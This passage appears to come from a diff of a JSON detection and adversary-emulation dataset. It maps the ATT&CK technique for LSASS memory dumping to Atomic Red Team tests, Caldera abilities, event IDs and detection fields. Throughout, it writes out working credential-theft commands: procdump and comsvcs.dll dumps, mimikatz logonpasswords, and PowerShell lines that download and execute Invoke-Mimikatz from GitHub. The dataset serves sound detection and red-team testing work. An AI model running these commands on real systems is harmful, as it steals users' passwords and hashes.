"product": "windows" + }, + "detection": { + "sysmon_processcreation": { + "Image": "*\\PSEXESVC.exe", + "User": "NT AUTHORITY\\SYSTEM" + } + } + }, + [ + "4688 ", + "Process CMD Line" + ], + [ + "4688", + "Process Execution" + ], + [ + "4657", + "Windows Registry" + ], + [ + "7045", + "New Service" + ], + [ + "7040", + "Service Change" + ], + [ + "4688 ", + "Process CMD Line" + ], + [ + "4688", + "Process Execution" + ], + [ + "4657", + "Windows Registry" + ], + [ + "7040/7045", + "New and changed Service" + ] + ], + "external_reference": [ + "https://securingtomorrow.mcafee.com/mcafee-labs/mcafee-uncovers-operation-honeybee-malicious-document-campaign-targeting-humanitarian-aid-groups/", + "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/march/apt15-is-alive-and-strong-an-analysis-of-royalcli-and-royaldns/", + "https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html", + "https://www.welivesecurity.com/2019/03/20/fake-or-fake-keeping-up-with-oceanlotus-decoys/" + ] + }, + { + "technique_id": "T1003.001", + "command_list": [ + "#{procdump_exe} -accepteula -ma lsass.exe C:\\Windows\\Temp\\lsass_dump.dmp\n", + "PathToAtomicsFolder\\T1003.001\\bin\\procdump.exe -accepteula -ma lsass.exe #{output_file}\n", + "C:\\Windows\\System32\\rundll32.exe C:\\windows\\System32\\comsvcs.dll, MiniDump (Get-Process lsass).id $env:TEMP\\lsass-comsvcs.dmp full\n", + "PathToAtomicsFolder\\T1003.001\\bin\\Outflank-Dumpert.exe\n", + "%temp%\\nanodump.x64.exe -w \"%temp%\\nanodump.dmp\"\n", + "#{mimikatz_exe} \"sekurlsa::minidump %tmp%\\lsass.DMP\" \"sekurlsa::logonpasswords full\" exit\n", + "PathToAtomicsFolder\\T1003.001\\bin\\mimikatz.exe \"sekurlsa::minidump #{input_file}\" \"sekurlsa::logonpasswords full\" exit\n", + "pypykatz live lsa\n", + "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX (New-Object 
Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Out-Minidump.ps1'); get-process lsass | Out-Minidump\n", + "#{procdump_exe} -accepteula -mm lsass.exe C:\\Windows\\Temp\\lsass_dump.dmp\n", + "PathToAtomicsFolder\\T1003.001\\bin\\procdump.exe -accepteula -mm lsass.exe #{output_file}\n", + "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f650520c4b1004daf8b3ec08007a0b945b91253a/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds\n", + "echo \"Createdump Path #{createdump_exe}\"\n$LSASS = tasklist | findstr \"lsass\"\n$FIELDS = $LSASS -split \"\\s+\"\n$ID = $FIELDS[1]\n& \"#{createdump_exe}\" -u -f C:\\Windows\\Temp\\dotnet-lsass.dmp $ID\n", + "echo \"Createdump Path C:\\Program Files\\dotnet\\shared\\Microsoft.NETCore.App\\5.*.*\\createdump.exe\"\n$LSASS = tasklist | findstr \"lsass\"\n$FIELDS = $LSASS -split \"\\s+\"\n$ID = $FIELDS[1]\n& \"C:\\Program Files\\dotnet\\shared\\Microsoft.NETCore.App\\5.*.*\\createdump.exe\" -u -f #{output_file} $ID\n", + "C:\\Windows\\Temp\\xordump.exe -out #{output_file} -x 0x41\n", + "#{xordump_exe} -out C:\\Windows\\Temp\\lsass-xordump.t1003.001.dmp -x 0x41\n", + "$ps_url = \"https://download.sysinternals.com/files/Procdump.zip\";\n$download_folder = \"C:\\Users\\Public\\\";\n$staging_folder = \"C:\\Users\\Public\\temp\";\nStart-BitsTransfer -Source $ps_url -Destination $download_folder;\nExpand-Archive -LiteralPath $download_folder\"Procdump.zip\" -DestinationPath $staging_folder;\n$arch=[System.Environment]::Is64BitOperatingSystem;\n\nif ($arch) {\n iex $staging_folder\"\\procdump64.exe -accepteula -ma lsass.exe\" > $env:APPDATA\\error.dmp 2>&1;\n} else {\n iex $staging_folder\"\\procdump.exe -accepteula -ma lsass.exe\" > $env:APPDATA\\error.dmp 2>&1;\n}\nremove-item $staging_folder -Recurse;\n", + "Import-Module .\\invoke-mimi.ps1;\nInvoke-Mimikatz -DumpCreds\n", + 
"[System.Net.ServicePointManager]::ServerCertificateValidationCallback = { $True };\n$web = (New-Object System.Net.WebClient);\n$result = $web.DownloadString(\"https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/4c7a2016fc7931cd37273c5d8e17b16d959867b3/Exfiltration/Invoke-Mimikatz.ps1\");\niex $result; Invoke-Mimikatz -DumpCreds\n" + ], + "commands": [ + { + "command": "#{procdump_exe} -accepteula -ma lsass.exe C:\\Windows\\Temp\\lsass_dump.dmp\n", + "source": "atomics/T1003.001/T1003.001.yaml", + "name": "Atomic Red Team Test - OS Credential Dumping: LSASS Memory" + }, + { + "command": "PathToAtomicsFolder\\T1003.001\\bin\\procdump.exe -accepteula -ma lsass.exe #{output_file}\n", + "source": "atomics/T1003.001/T1003.001.yaml", + "name": "Atomic Red Team Test - OS Credential Dumping: LSASS Memory" + }, + { + "command": "C:\\Windows\\System32\\rundll32.exe C:\\windows\\System32\\comsvcs.dll, MiniDump (Get-Process lsass).id $env:TEMP\\lsass-comsvcs.dmp full\n", + "source": "atomics/T1003.001/T1003.001.yaml", + "name": "Atomic Red Team Test - OS Credential Dumping: LSASS Memory" + }, + { + "command": "PathToAtomicsFolder\\T1003.001\\bin\\Outflank-Dumpert.exe\n", + "source": "atomics/T1003.001/T1003.001.yaml", + "name": "Atomic Red Team Test - OS Credential Dumping: LSASS Memory" + }, + { + "command": "%temp%\\nanodump.x64.exe -w \"%temp%\\nanodump.dmp\"\n", + "source": "atomics/T1003.001/T1003.001.yaml", + "name": "Atomic Red Team Test - OS Credential Dumping: LSASS Memory" + }, + { + "command": "#{mimikatz_exe} \"sekurlsa::minidump %tmp%\\lsass.DMP\" \"sekurlsa::logonpasswords full\" exit\n", + "source": "atomics/T1003.001/T1003.001.yaml", + "name": "Atomic Red Team Test - OS Credential Dumping: LSASS Memory" + }, + { + "command": "PathToAtomicsFolder\\T1003.001\\bin\\mimikatz.exe \"sekurlsa::minidump #{input_file}\" \"sekurlsa::logonpasswords full\" exit\n", + "source": "atomics/T1003.001/T1003.001.yaml", + "name": "Atomic Red Team Test - OS Credential 
Dumping: LSASS Memory" + }, + { + "command": "pypykatz live lsa\n", + "source": "atomics/T1003.001/T1003.001.yaml", + "name": "Atomic Red Team Test - OS Credential Dumping: LSASS Memory" + }, + { + "command": "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Out-Minidump.ps1'); get-process lsass | Out-Minidump\n", + "source": "atomics/T1003.001/T1003.001.yaml", + "name": "Atomic Red Team Test - OS Credential Dumping: LSASS Memory" + }, + { + "command": "#{procdump_exe} -accepteula -mm lsass.exe C:\\Windows\\Temp\\lsass_dump.dmp\n", + "source": "atomics/T1003.001/T1003.001.yaml", + "name": "Atomic Red Team Test - OS Credential Dumping: LSASS Memory" + }, + { + "command": "PathToAtomicsFolder\\T1003.001\\bin\\procdump.exe -accepteula -mm lsass.exe #{output_file}\n", + "source": "atomics/T1003.001/T1003.001.yaml", + "name": "Atomic Red Team Test - OS Credential Dumping: LSASS Memory" + }, + { + "command": "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f650520c4b1004daf8b3ec08007a0b945b91253a/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds\n", + "source": "atomics/T1003.001/T1003.001.yaml", + "name": "Atomic Red Team Test - OS Credential Dumping: LSASS Memory" + }, + { + "command": "echo \"Createdump Path #{createdump_exe}\"\n$LSASS = tasklist | findstr \"lsass\"\n$FIELDS = $LSASS -split \"\\s+\"\n$ID = $FIELDS[1]\n& \"#{createdump_exe}\" -u -f C:\\Windows\\Temp\\dotnet-lsass.dmp $ID\n", + "source": "atomics/T1003.001/T1003.001.yaml", + "name": "Atomic Red Team Test - OS Credential Dumping: LSASS Memory" + }, + { + "command": "echo \"Createdump Path C:\\Program Files\\dotnet\\shared\\Microsoft.NETCore.App\\5.*.*\\createdump.exe\"\n$LSASS = tasklist | findstr \"lsass\"\n$FIELDS = $LSASS -split \"\\s+\"\n$ID = $FIELDS[1]\n& \"C:\\Program 
Files\\dotnet\\shared\\Microsoft.NETCore.App\\5.*.*\\createdump.exe\" -u -f #{output_file} $ID\n", + "source": "atomics/T1003.001/T1003.001.yaml", + "name": "Atomic Red Team Test - OS Credential Dumping: LSASS Memory" + }, + { + "command": "C:\\Windows\\Temp\\xordump.exe -out #{output_file} -x 0x41\n", + "source": "atomics/T1003.001/T1003.001.yaml", + "name": "Atomic Red Team Test - OS Credential Dumping: LSASS Memory" + }, + { + "command": "#{xordump_exe} -out C:\\Windows\\Temp\\lsass-xordump.t1003.001.dmp -x 0x41\n", + "source": "atomics/T1003.001/T1003.001.yaml", + "name": "Atomic Red Team Test - OS Credential Dumping: LSASS Memory" + }, + { + "command": "$ps_url = \"https://download.sysinternals.com/files/Procdump.zip\";\n$download_folder = \"C:\\Users\\Public\\\";\n$staging_folder = \"C:\\Users\\Public\\temp\";\nStart-BitsTransfer -Source $ps_url -Destination $download_folder;\nExpand-Archive -LiteralPath $download_folder\"Procdump.zip\" -DestinationPath $staging_folder;\n$arch=[System.Environment]::Is64BitOperatingSystem;\n\nif ($arch) {\n iex $staging_folder\"\\procdump64.exe -accepteula -ma lsass.exe\" > $env:APPDATA\\error.dmp 2>&1;\n} else {\n iex $staging_folder\"\\procdump.exe -accepteula -ma lsass.exe\" > $env:APPDATA\\error.dmp 2>&1;\n}\nremove-item $staging_folder -Recurse;\n", + "source": "data/abilities/credential-access/0ef4cc7b-611c-4237-b20b-db36b6906554.yml", + "name": "Dump lsass for later use with mimikatz" + }, + { + "command": "Import-Module .\\invoke-mimi.ps1;\nInvoke-Mimikatz -DumpCreds\n", + "source": "data/abilities/credential-access/7049e3ec-b822-4fdf-a4ac-18190f9b66d1.yml", + "name": "Use Invoke-Mimikatz" + }, + { + "command": "[System.Net.ServicePointManager]::ServerCertificateValidationCallback = { $True };\n$web = (New-Object System.Net.WebClient);\n$result = $web.DownloadString(\"https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/4c7a2016fc7931cd37273c5d8e17b16d959867b3/Exfiltration/Invoke-Mimikatz.ps1\");\niex $result; 
Invoke-Mimikatz -DumpCreds\n", + "source": "data/abilities/credential-access/baac2c6d-4652-4b7e-ab0a-f1bf246edd12.yml", + "name": "Use powerkatz to execute mimikatz and attempt to grab plaintext and/or hashed passwords" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1003.001", + "display_name": "OS Credential Dumping: LSASS Memory", + "atomic_tests": [ + { + "name": "Dump LSASS.exe Memory using ProcDump", + "auto_generated_guid": "0be2230c-9ab3-4ac2-8826-3199b9a0ebf8", + "description": "The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with Sysinternals\nProcDump.\n\nUpon successful execution, you should see the following file created c:\\windows\\temp\\lsass_dump.dmp.\n\nIf you see a message saying \"procdump.exe is not recognized as an internal or external command\", try using the get-prereq_commands to download and install the ProcDump tool first.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "output_file": { + "description": "Path where resulting dump should be placed", + "type": "Path", + "default": "C:\\Windows\\Temp\\lsass_dump.dmp" + }, + "procdump_exe": { + "description": "Path of Procdump executable", + "type": "Path", + "default": "PathToAtomicsFolder\\T1003.001\\bin\\procdump.exe" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "ProcDump tool from Sysinternals must exist on disk at specified location (#{procdump_exe})\n", + "prereq_command": "if (Test-Path #{procdump_exe}) {exit 0} else {exit 1}\n", + "get_prereq_command": "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nInvoke-WebRequest \"https://download.sysinternals.com/files/Procdump.zip\" -OutFile \"$env:TEMP\\Procdump.zip\"\nExpand-Archive $env:TEMP\\Procdump.zip $env:TEMP\\Procdump -Force\nNew-Item -ItemType Directory (Split-Path #{procdump_exe}) -Force | Out-Null\nCopy-Item $env:TEMP\\Procdump\\Procdump.exe #{procdump_exe} 
-Force\n" + } + ], + "executor": { + "command": "#{procdump_exe} -accepteula -ma lsass.exe #{output_file}\n", + "cleanup_command": "del \"#{output_file}\" >nul 2> nul\n", + "name": "command_prompt", + "elevation_required": true + } + }, + { + "name": "Dump LSASS.exe Memory using comsvcs.dll", + "auto_generated_guid": "2536dee2-12fb-459a-8c37-971844fa73be", + "description": "The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with a built-in dll.\n\nUpon successful execution, you should see the following file created $env:TEMP\\lsass-comsvcs.dmp.\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "C:\\Windows\\System32\\rundll32.exe C:\\windows\\System32\\comsvcs.dll, MiniDump (Get-Process lsass).id $env:TEMP\\lsass-comsvcs.dmp full\n", + "cleanup_command": "Remove-Item $env:TEMP\\lsass-comsvcs.dmp -ErrorAction Ignore\n", + "name": "powershell", + "elevation_required": true + } + }, + { + "name": "Dump LSASS.exe Memory using direct system calls and API unhooking", + "auto_generated_guid": "7ae7102c-a099-45c8-b985-4c7a2d05790d", + "description": "The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved using direct system calls and API unhooking in an effort to avoid detection. 
\nhttps://github.com/outflanknl/Dumpert\nhttps://outflank.nl/blog/2019/06/19/red-team-tactics-combining-direct-system-calls-and-srdi-to-bypass-av-edr/\nUpon successful execution, you should see the following file created C:\\\\windows\\\\temp\\\\dumpert.dmp.\n\nIf you see a message saying \\\"The system cannot find the path specified.\\\", try using the get-prereq_commands to download the tool first.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "dumpert_exe": { + "description": "Path of Dumpert executable", + "type": "Path", + "default": "PathToAtomicsFolder\\T1003.001\\bin\\Outflank-Dumpert.exe" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "Dumpert executable must exist on disk at specified location (#{dumpert_exe})\n", + "prereq_command": "if (Test-Path #{dumpert_exe}) {exit 0} else {exit 1}\n", + "get_prereq_command": "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nNew-Item -ItemType Directory (Split-Path #{dumpert_exe}) -Force | Out-Null\nInvoke-WebRequest \"https://github.com/clr2of8/Dumpert/raw/5838c357224cc9bc69618c80c2b5b2d17a394b10/Dumpert/x64/Release/Outflank-Dumpert.exe\" -OutFile #{dumpert_exe}\n" + } + ], + "executor": { + "command": "#{dumpert_exe}\n", + "cleanup_command": "del C:\\windows\\temp\\dumpert.dmp >nul 2> nul\n", + "name": "command_prompt", + "elevation_required": true + } + }, + { + "name": "Dump LSASS.exe Memory using NanoDump", + "auto_generated_guid": "dddd4aca-bbed-46f0-984d-e4c5971c51ea", + "description": "The NanoDump tool uses syscalls and an invalid dump signature to avoid detection.\n\nhttps://github.com/helpsystems/nanodump\n\nUpon successful execution, you should find the nanondump.dmp file in the temp directory\n", + "supported_platforms": [ + "windows" + ], + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "NanoDump executable must exist on disk at specified location 
($env:TEMP\\nanodump.x64.exe)\n", + "prereq_command": "if (Test-Path $env:TEMP\\nanodump.x64.exe) {exit 0} else {exit 1}\n", + "get_prereq_command": "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nInvoke-WebRequest \"https://github.com/helpsystems/nanodump/raw/84db0c1737bbe027431733c193cfacf59a07259b/compiled/nanodump.x64.exe\" -OutFile \"$env:TEMP\\nanodump.x64.exe\"\n" + } + ], + "executor": { + "command": "%temp%\\nanodump.x64.exe -w \"%temp%\\nanodump.dmp\"\n", + "cleanup_command": "del \"%temp%\\nanodump.dmp\" >nul 2> nul\n", + "name": "command_prompt", + "elevation_required": true + } + }, + { + "name": "Dump LSASS.exe Memory using Windows Task Manager", + "auto_generated_guid": "dea6c349-f1c6-44f3-87a1-1ed33a59a607", + "description": "The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with the Windows Task\nManager and administrative permissions.\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "steps": "1. Open Task Manager:\n On a Windows system this can be accomplished by pressing CTRL-ALT-DEL and selecting Task Manager or by right-clicking\n on the task bar and selecting \"Task Manager\".\n\n2. Select lsass.exe:\n If lsass.exe is not visible, select \"Show processes from all users\". This will allow you to observe execution of lsass.exe\n and select it for manipulation.\n\n3. Dump lsass.exe memory:\n Right-click on lsass.exe in Task Manager. Select \"Create Dump File\". The following dialog will show you the path to the saved file.\n", + "name": "manual" + } + }, + { + "name": "Offline Credential Theft With Mimikatz", + "auto_generated_guid": "453acf13-1dbd-47d7-b28a-172ce9228023", + "description": "The memory of lsass.exe is often dumped for offline credential theft attacks. Adversaries commonly perform this offline analysis with\nMimikatz. 
This tool is available at https://github.com/gentilkiwi/mimikatz and can be obtained using the get-prereq_commands.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "input_file": { + "description": "Path of the Lsass dump", + "type": "Path", + "default": "%tmp%\\lsass.DMP" + }, + "mimikatz_exe": { + "description": "Path of the Mimikatz binary", + "type": "String", + "default": "PathToAtomicsFolder\\T1003.001\\bin\\mimikatz.exe" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "Mimikatz must exist on disk at specified location (#{mimikatz_exe})\n", + "prereq_command": "if (Test-Path #{mimikatz_exe}) {exit 0} else {exit 1}\n", + "get_prereq_command": "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\n$mimikatz_relative_uri = Invoke-WebRequest \"https://github.com/gentilkiwi/mimikatz/releases/latest\" -UseBasicParsing | Select-Object -ExpandProperty Links | Where-Object -Property href -Like \"*/mimikatz_trunk.zip\" | Select-Object -ExpandProperty href\nInvoke-WebRequest \"https://github.com$mimikatz_relative_uri\" -UseBasicParsing -OutFile \"$env:TEMP\\Mimi.zip\"\nExpand-Archive $env:TEMP\\Mimi.zip $env:TEMP\\Mimi -Force\nNew-Item -ItemType Directory (Split-Path #{mimikatz_exe}) -Force | Out-Null\nCopy-Item $env:TEMP\\Mimi\\x64\\mimikatz.exe #{mimikatz_exe} -Force\n" + }, + { + "description": "Lsass dump must exist at specified location (#{input_file})\n", + "prereq_command": "cmd /c \"if not exist #{input_file} (exit /b 1)\"\n", + "get_prereq_command": "Write-Host \"Create the lsass dump manually using the steps in the previous test (Dump LSASS.exe Memory using Windows Task Manager)\"\n" + } + ], + "executor": { + "command": "#{mimikatz_exe} \"sekurlsa::minidump #{input_file}\" \"sekurlsa::logonpasswords full\" exit\n", + "name": "command_prompt", + "elevation_required": true + } + }, + { + "name": "LSASS read with pypykatz", + "auto_generated_guid": 
"c37bc535-5c62-4195-9cc3-0517673171d8", + "description": "Parses secrets hidden in the LSASS process with python. Similar to mimikatz's sekurlsa::\n\nPython 3 must be installed, use the get_prereq_command's to meet the prerequisites for this test.\n\nSuccessful execution of this test will display multiple useranames and passwords/hashes to the screen.\n", + "supported_platforms": [ + "windows" + ], + "dependency_executor_name": "command_prompt", + "dependencies": [ + { + "description": "Computer must have python 3 installed\n", + "prereq_command": "py -3 --version >nul 2>&1\nexit /b %errorlevel%\n", + "get_prereq_command": "echo \"Python 3 must be installed manually\"\n" + }, + { + "description": "Computer must have pip installed\n", + "prereq_command": "py -3 -m pip --version >nul 2>&1\nexit /b %errorlevel%\n", + "get_prereq_command": "echo \"PIP must be installed manually\"\n" + }, + { + "description": "pypykatz must be installed and part of PATH\n", + "prereq_command": "pypykatz -h >nul 2>&1\nexit /b %errorlevel%\n", + "get_prereq_command": "pip install pypykatz\n" + } + ], + "executor": { + "command": "pypykatz live lsa\n", + "name": "command_prompt", + "elevation_required": true + } + }, + { + "name": "Dump LSASS.exe Memory using Out-Minidump.ps1", + "auto_generated_guid": "6502c8f0-b775-4dbd-9193-1298f56b6781", + "description": "The memory of lsass.exe is often dumped for offline credential theft attacks. 
This test leverages a pure\npowershell implementation that leverages the MiniDumpWriteDump Win32 API call.\nUpon successful execution, you should see the following file created $env:SYSTEMROOT\\System32\\lsass_*.dmp.\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Out-Minidump.ps1'); get-process lsass | Out-Minidump\n", + "cleanup_command": "Remove-Item $env:TEMP\\lsass_*.dmp -ErrorAction Ignore\n", + "name": "powershell", + "elevation_required": true + } + }, + { + "name": "Create Mini Dump of LSASS.exe using ProcDump", + "auto_generated_guid": "7cede33f-0acd-44ef-9774-15511300b24b", + "description": "The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with Sysinternals\nProcDump. This particular method uses -mm to produce a mini dump of lsass.exe\n\nUpon successful execution, you should see the following file created c:\\windows\\temp\\lsass_dump.dmp.\n\nIf you see a message saying \"procdump.exe is not recognized as an internal or external command\", try using the get-prereq_commands to download and install the ProcDump tool first.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "output_file": { + "description": "Path where resulting dump should be placed", + "type": "Path", + "default": "C:\\Windows\\Temp\\lsass_dump.dmp" + }, + "procdump_exe": { + "description": "Path of Procdump executable", + "type": "Path", + "default": "PathToAtomicsFolder\\T1003.001\\bin\\procdump.exe" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "ProcDump tool from Sysinternals must exist on disk at specified location (#{procdump_exe})\n", + "prereq_command": "if (Test-Path #{procdump_exe}) {exit 0} else {exit 1}\n", + 
"get_prereq_command": "Invoke-WebRequest \"https://download.sysinternals.com/files/Procdump.zip\" -OutFile \"$env:TEMP\\Procdump.zip\"\nExpand-Archive $env:TEMP\\Procdump.zip $env:TEMP\\Procdump -Force\nNew-Item -ItemType Directory (Split-Path #{procdump_exe}) -Force | Out-Null\nCopy-Item $env:TEMP\\Procdump\\Procdump.exe #{procdump_exe} -Force\n" + } + ], + "executor": { + "command": "#{procdump_exe} -accepteula -mm lsass.exe #{output_file}\n", + "cleanup_command": "del \"#{output_file}\" >nul 2> nul\n", + "name": "command_prompt", + "elevation_required": true + } + }, + { + "name": "Powershell Mimikatz", + "auto_generated_guid": "66fb0bc1-3c3f-47e9-a298-550ecfefacbc", + "description": "Dumps credentials from memory via Powershell by invoking a remote mimikatz script.\nIf Mimikatz runs successfully you will see several usernames and hashes output to the screen.\nCommon failures include seeing an \\\"access denied\\\" error which results when Anti-Virus blocks execution. \nOr, if you try to run the test without the required administrative privleges you will see this error near the bottom of the output to the screen \"ERROR kuhl_m_sekurlsa_acquireLSA\"\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "remote_script": { + "description": "URL to a remote Mimikatz script that dumps credentials", + "type": "Url", + "default": "https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f650520c4b1004daf8b3ec08007a0b945b91253a/Exfiltration/Invoke-Mimikatz.ps1" + } + }, + "executor": { + "command": "IEX (New-Object Net.WebClient).DownloadString('#{remote_script}'); Invoke-Mimikatz -DumpCreds\n", + "name": "powershell", + "elevation_required": true + } + }, + { + "name": "Dump LSASS with .Net 5 createdump.exe", + "auto_generated_guid": "9d0072c8-7cca-45c4-bd14-f852cfa35cf0", + "description": "This test uses the technique describe in this tweet \n(https://twitter.com/bopin2020/status/1366400799199272960?s=20) from @bopin2020 in order to dump 
lsass\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "output_file": { + "description": "Path where resulting dump should be placed", + "type": "Path", + "default": "C:\\Windows\\Temp\\dotnet-lsass.dmp" + }, + "createdump_exe": { + "description": "Path of createdump.exe executable", + "type": "Path", + "default": "C:\\Program Files\\dotnet\\shared\\Microsoft.NETCore.App\\5.*.*\\createdump.exe" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "Computer must have createdump.exe from .Net 5\n", + "prereq_command": "if (Test-Path '#{createdump_exe}') {exit 0} else {exit 1}\n", + "get_prereq_command": "echo \".NET 5 must be installed manually.\" \"For the very brave a copy of the executable can be found here: https://github.com/Scoubi/RedTeam-Tools/blob/main/createdump.exe\"\n" + } + ], + "executor": { + "command": "echo \"Createdump Path #{createdump_exe}\"\n$LSASS = tasklist | findstr \"lsass\"\n$FIELDS = $LSASS -split \"\\s+\"\n$ID = $FIELDS[1]\n& \"#{createdump_exe}\" -u -f #{output_file} $ID\n", + "cleanup_command": "Remove-Item #{output_file} -ErrorAction Ignore\n", + "name": "powershell", + "elevation_required": true + } + }, + { + "name": "Dump LSASS.exe using imported Microsoft DLLs", + "auto_generated_guid": "86fc3f40-237f-4701-b155-81c01c48d697", + "description": "The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved by\nimporting built-in DLLs and calling exported functions. 
Xordump will re-read the resulting minidump \nfile and delete it immediately to avoid brittle EDR detections that signature lsass minidump files.\n\nUpon successful execution, you should see the following file created $env:TEMP\\lsass-xordump.t1003.001.dmp.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "xordump_exe": { + "description": "Path to xordump", + "type": "Path", + "default": "C:\\Windows\\Temp\\xordump.exe" + }, + "output_file": { + "description": "Path where resulting dump should be placed", + "type": "Path", + "default": "C:\\Windows\\Temp\\lsass-xordump.t1003.001.dmp" + } + }, + "dependencies": [ + { + "description": "Computer must have xordump.exe\n", + "prereq_command": "if (Test-Path '#{xordump_exe}') {exit 0} else {exit 1}\n", + "get_prereq_command": "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nInvoke-WebRequest \"https://github.com/audibleblink/xordump/releases/download/v0.0.1/xordump.exe\" -OutFile #{xordump_exe}\n" + } + ], + "executor": { + "command": "#{xordump_exe} -out #{output_file} -x 0x41\n", + "cleanup_command": "Remove-Item #{output_file} -ErrorAction Ignore\n", + "name": "powershell", + "elevation_required": true + } + } + ] + }, + { + "id": "0ef4cc7b-611c-4237-b20b-db36b6906554", + "name": "Leverage Procdump for lsass memory", + "description": "Dump lsass for later use with mimikatz", + "tactic": "credential-access", + "technique": { + "attack_id": "T1003.001", + "name": "OS Credential Dumping: LSASS Memory" + }, + "platforms": { + "windows": { + "psh": { + "command": "$ps_url = \"https://download.sysinternals.com/files/Procdump.zip\";\n$download_folder = \"C:\\Users\\Public\\\";\n$staging_folder = \"C:\\Users\\Public\\temp\";\nStart-BitsTransfer -Source $ps_url -Destination $download_folder;\nExpand-Archive -LiteralPath $download_folder\"Procdump.zip\" -DestinationPath $staging_folder;\n$arch=[System.Environment]::Is64BitOperatingSystem;\n\nif ($arch) {\n iex 
$staging_folder\"\\procdump64.exe -accepteula -ma lsass.exe\" > $env:APPDATA\\error.dmp 2>&1;\n} else {\n iex $staging_folder\"\\procdump.exe -accepteula -ma lsass.exe\" > $env:APPDATA\\error.dmp 2>&1;\n}\nremove-item $staging_folder -Recurse;\n" + } + } + } + }, + { + "id": "7049e3ec-b822-4fdf-a4ac-18190f9b66d1", + "name": "Powerkatz (Staged)", + "description": "Use Invoke-Mimikatz", + "tactic": "credential-access", + "technique": { + "attack_id": "T1003.001", + "name": "OS Credential Dumping: LSASS Memory" + }, + "privilege": "Elevated", + "platforms": { + "windows": { + "psh": { + "command": "Import-Module .\\invoke-mimi.ps1;\nInvoke-Mimikatz -DumpCreds\n", + "parsers": { + "plugins.stockpile.app.parsers.katz": [ + { + "source": "domain.user.name", + "edge": "has_password", + "target": "domain.user.password" + }, + { + "source": "domain.user.name", + "edge": "has_hash", + "target": "domain.user.ntlm" + }, + { + "source": "domain.user.name", + "edge": "has_hash", + "target": "domain.user.sha1" + } + ] + }, + "payloads": [ + "invoke-mimi.ps1" + ] + } + } + } + }, + { + "id": "baac2c6d-4652-4b7e-ab0a-f1bf246edd12", + "name": "Run PowerKatz", + "description": "Use powerkatz to execute mimikatz and attempt to grab plaintext and/or hashed passwords", + "tactic": "credential-access", + "technique": { + "attack_id": "T1003.001", + "name": "OS Credential Dumping: LSASS Memory" + }, + "platforms": { + "windows": { + "psh": { + "command": "[System.Net.ServicePointManager]::ServerCertificateValidationCallback = { $True };\n$web = (New-Object System.Net.WebClient);\n$result = $web.DownloadString(\"https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/4c7a2016fc7931cd37273c5d8e17b16d959867b3/Exfiltration/Invoke-Mimikatz.ps1\");\niex $result; Invoke-Mimikatz -DumpCreds\n", + "parsers": { + "plugins.stockpile.app.parsers.katz": [ + { + "source": "domain.user.name", + "edge": "has_password", + "target": "domain.user.password" + } + ] + } + } + } + } + } + ], + "queries": 
[], + "possible_detections": [ + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": 